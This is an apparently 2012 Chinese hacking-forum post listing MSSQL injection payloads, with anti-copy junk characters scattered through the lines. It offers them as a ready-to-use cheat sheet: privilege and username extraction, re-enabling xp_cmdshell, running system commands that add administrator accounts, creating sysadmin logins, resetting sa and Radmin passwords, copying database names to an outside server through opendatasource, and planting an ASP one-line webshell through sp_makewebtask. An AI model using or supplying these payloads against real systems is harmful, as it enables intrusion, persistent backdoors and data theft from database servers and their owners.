找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1788|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令8 C4 U8 u# R5 _3 g/ L
//看看是什么权限的
8 Q& l4 J# n4 v+ e1 k  l8 W) }: F: L0 wand 1=(Select IS_MEMBER('db_owner')): G9 L! b- v" p' x
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--) W1 \/ D5 ?, n! t& j- M- T

. s  C5 B; s3 J/ y2 e4 W//检测是否有读取某数据库的权限
* d5 \0 z# F8 Q* t+ g' i3 Dand 1= (Select HAS_DBACCESS('master'))0 U+ i& S$ o9 q6 r1 n& z3 V
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --" g4 I" \$ W2 N4 V3 s' }1 T
4 \1 Y* v  ?7 t' ?

$ N; p, Z. k' E) v; ?数字类型
* T- k9 j. U7 {  I4 P1 I5 W+ x; Band char(124)%2Buser%2Bchar(124)=00 |2 i" J6 N+ e1 I$ ^# @$ G

/ ^) g( I  z2 B0 V' {0 R字符类型& Y# Y- Z0 m/ V6 J' w2 l- E1 G
' and char(124)%2Buser%2Bchar(124)=0 and ''='
1 u, d. d) J" \. W4 i# v& O; S; }# P! R- D2 a3 I
搜索类型
1 L; F( j: v& }' and char(124)%2Buser%2Bchar(124)=0 and '%'='; T' R( t4 C3 B: p9 A5 J' v  E# D
* B0 B& J" f4 Z' b
爆用户名
. }0 \% v3 c& x$ x  j. Sand user>0  D! v1 N- Q  @4 T0 p* f" Q; L
' and user>0 and ''='
9 |0 H/ \# N! H" S
! C3 b9 @5 Q6 t9 U' Y  ?1 m4 [检测是否为SA权限
1 L- `: ~: ^1 |* w, C% land 1=(select IS_SRVROLEMEMBER('sysadmin'));--: _5 r; ^# c: I+ H' y
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
0 m* z3 B; j  J5 x% H- A0 V) H9 d* d5 ^+ E# r
检测是不是MSSQL数据库7 q! h/ Z3 K) a1 r
and exists (select * from sysobjects);--
: ~, o/ N  I! J* [/ |& W6 H3 v& _7 M% \5 Y" V# g3 V: {
检测是否支持多行3 y( ^" O- v$ S3 s7 g$ o) G
;declare @d int;--
" n5 [& ^' p% R1 G' X$ g( r" U& F9 g0 f
恢复 xp_cmdshell
( T; o; Y# d5 l& X( C9 b;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
3 u$ {2 t  G' c% I4 l3 `% D6 N
: P& O" v0 B$ E$ B+ C# I& v$ X6 @( k) @7 x5 M& i* m- m5 J4 J8 k
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 4 q( E7 T" @9 k# `5 G( R
1 a$ a% @4 @8 Y. R
//-----------------------2 l+ f% t6 p; F+ `" d
//      执行命令( S. h2 c, ]' F3 @' x
//-----------------------9 `$ y- C  k5 S7 F: y
首先开启沙盘模式:
# e) G: q/ _3 B* u# Z0 ^: K3 sexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, u- E8 h" _% F: u# a9 l

$ \; s- M- }9 k- _6 A8 |然后利用jet.oledb执行系统命令
1 [/ ~5 ?& W0 d3 r* u. vselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')9 }7 O7 d! I$ z+ F" ~2 W4 c/ E

# e8 k: @& h7 ]6 U1 e0 M执行命令/ c8 I$ m7 H& h( Y3 f% q
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
& i4 A) Y) W, }2 l9 [, F9 D, X5 Q, D
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'0 A; b( j4 _) b: A: Z7 \1 \. R8 H5 V

! x9 `: |; e; Q2 p判断xp_cmdshell扩展存储过程是否存在:
5 g/ ?8 Q) U% w+ khttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
; @8 r2 y2 F1 F5 p3 Z3 V$ n( I
) ~) L; F) T+ d7 A" B1 d+ u写注册表# z# U8 a7 |2 T
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: Q1 ?; [3 N7 {& X: f: \
. n: z2 |$ C* [: j
REG_SZ9 x8 K# f0 v* i) Z

4 `- U1 [5 \$ t  F$ @9 }2 M2 j读注册表* u) x2 c+ e9 d1 R1 v5 \$ D; ~
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
8 ^* h! O7 h* ^3 a3 J3 C" c; ?0 e3 ^5 y' E3 M
读取目录内容  a. w" n/ D' ?  n3 s  `- J
exec master..xp_dirtree 'c:\winnt\system32\',1,1
% `9 P  `# h2 Q. ]# d* Z
+ O* q6 k" h+ g* {/ e2 l0 S
( A9 \- D* D; B4 [/ `数据库备份
4 R: T8 U% ?4 N8 o/ k% Wbackup database pubs to disk = 'c:\123.bak'6 |5 m$ L3 q" |( k) A  p
3 d2 H& T; m% V0 z
//爆出长度& D0 X- F5 T$ ]* k9 J$ L6 ]* V: |' l
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--( Y  ~. L8 o5 `$ \$ Z7 e% i, R

) n: X& P! F1 S# [0 k  y
/ [' j* u3 e9 ^6 X( T; x5 g% q! e) s* K
更改sa口令方法:用sql综合利用工具连接后,执行命令:9 ]( q* y$ X" M7 N3 S
exec sp_password NULL,'新密码','sa'6 y* ]4 G/ Y1 J: P
4 }  N7 K! Q7 \! C
添加和删除一个SA权限的用户test:* |# B+ [$ k$ [* u4 }: K
exec master.dbo.sp_addlogin test,ptlove" M! Y& W: m$ @% @. R
exec master.dbo.sp_addsrvrolemember test,sysadmin4 W9 E( L( b+ }  H% U
; F" K7 w: C" a3 z: C& L5 m
删除扩展存储过过程xp_cmdshell的语句: : q# r) T. e$ e- F8 Q' U) e+ M
exec sp_dropextendedproc 'xp_cmdshell', i) {: Y. O: Z* R1 d: f8 |* Y
- A2 l5 N2 A9 g- a( [
添加扩展存储过过程' f( d$ d" l1 X( g/ I, F- M
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' , M6 y; B3 K; H" H
GRANT exec On xp_proxiedadata TO public % P2 e2 Z) `- u6 ~7 X' X9 i5 }/ f

, J0 H0 H. D8 e# n& J- Y+ u9 m7 G/ y7 o4 L
停掉或激活某个服务。
; ]# \# Q9 d$ D. M; R+ u$ D: G/ r) F" y
exec master..xp_servicecontrol 'stop','schedule'
( s# t1 l* w, n* h) Mexec master..xp_servicecontrol 'start','schedule'
, a0 W: U. Z* B' c" q; H/ X0 p+ q; a+ K. e8 y0 I$ V
dbo.xp_subdirs( R& a/ g% s! u) _6 w; e
1 e8 B& {! k$ D" @. Z
只列某个目录下的子目录。7 }4 l/ i6 J4 E
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
, D% a% i/ T4 a: C) Q0 X
7 z4 I, ?8 C. `% v- c, Z' sdbo.xp_makecab
7 A$ ~6 z% O4 c* _3 [' a8 t2 }9 _* [
  t6 l6 |! ]/ z! K1 ?7 {! X5 f将目标多个档案压缩到某个目标档案之内。  U0 P' {1 y2 _, ]1 g
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
* i2 ^( G! u4 q3 z- l4 x3 q7 I) B8 p3 {
dbo.xp_makecab
% N& e" w5 i) L4 K- ~; I; W'c:\test.cab','mszip',1,) q2 r1 d0 o) a$ }4 p
'C:\Inetpub\wwwroot\SQLInject\login.asp',/ D3 G, H. H0 R2 I) A) M1 Z5 @
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'( q' w, g2 T, O  Y. T2 g
% H: u% e7 ~% T  h& m2 r
xp_terminate_process: o8 I, z' L4 H% U- g& B# p7 c

( h4 j7 O! W) P8 m% S) T停掉某个执行中的程序,但赋予的参数是 Process ID。
8 x, u# Y5 o1 \/ B: f. o利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID0 {4 a+ R, V. n9 t5 I

3 ?4 j; Y# s! N+ ?" |xp_terminate_process 2484
5 ~1 d- U$ y' M7 A" L) ^
  X( ~# {2 Q$ Z* B, @( gxp_unpackcab2 B1 P! K+ n9 B$ C+ D

- e+ Q2 j7 E" @; V; n8 k解开压缩档。
7 o: X2 n  G  n9 m* \% Y- {; V7 ~: N
xp_unpackcab 'c:\test.cab','c:\temp',1" y2 ~5 L2 ]7 X; S7 A

  @( n$ \* ?6 B+ y: T  A  d2 ~/ T8 S+ a7 _* C' m7 F
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
, ?, \/ G& G! V6 Z" o" c( }  _6 i0 a
create database lcx;; K% t# R' q5 G8 H8 F% L% h
Create TABLE ku(name nvarchar(256) null);8 P2 |8 T: K4 }! c. [* Q! a8 [0 z
Create TABLE biao(id int NULL,name nvarchar(256) null);
# {6 S7 T" j! D* i6 b" \2 E1 Z9 w/ {' g8 i# v0 w
//得到数据库名
( D- N0 r) k" \8 g/ _$ Y2 S2 Ainsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
& R# J  U6 _/ Q; s( A# @; ~' x2 Q; Y9 n- q' O' r* C

" W- |$ z3 {0 `# c! e. v" k, x//在Master中创建表,看看权限怎样% f0 U* n( S4 D9 M& B: ^' E
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--' Z$ I8 ~0 g8 `
8 r1 ~+ K% @* D5 _! m
用 sp_makewebtask直接在web目录里写入一句话马:" V) w1 {$ b- C9 ~, t! Z
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
% _6 ^7 X: N1 n
; C# q9 U) X3 Z' a" O. k& R+ @//更新表内容( Y1 U4 a3 ?  P; J6 y4 g8 [& o2 o# u
Update films SET kind = 'Dramatic' Where id = 1234 W, l, E, o4 y, Z
  [4 O& }5 A2 C# }/ D
//删除内容
  s! X, a7 U" s, R% @8 j2 Q( cdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表